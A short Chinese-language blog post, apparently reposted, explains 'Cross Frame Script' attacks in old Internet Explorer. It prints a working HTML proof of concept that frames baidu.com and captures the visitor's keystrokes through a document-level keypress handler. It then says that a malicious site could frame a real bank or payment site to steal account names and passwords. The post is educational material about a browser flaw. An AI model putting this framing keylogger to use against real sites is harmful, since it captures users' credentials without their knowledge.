Cross Frame Script 跨框架指令碼 攻擊
分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow
也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!
什麼是Cross Frame Script?
很簡單,做個實驗就知道了。把下面的這段HTML程式碼另存為一個html檔案,然後用ie瀏覽器開啟。
<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onload="this.focus();" onblur="this.focus();" cols="100%">
<frame src="http://www.baidu.com/" scrolling="auto">
</frameset>
</html>
當你在百度的搜尋框輸入字元時,你會發現左下角的狀態列上出現了你輸入的字元。
Cross Frame Script 原理
利用瀏覽器允許框架(frame)跨站包含其它頁面的漏洞,在主框架的程式碼中加入scirpt,監視、盜取使用者輸入。
Cross Frame Script 危害
一個惡意的站點可以通過用框架包含真的網銀或線上支付網站,獲取使用者賬號和密碼。
更詳細的資料參考,http://www.xs4all.nl/~ppk/js/crosfram.html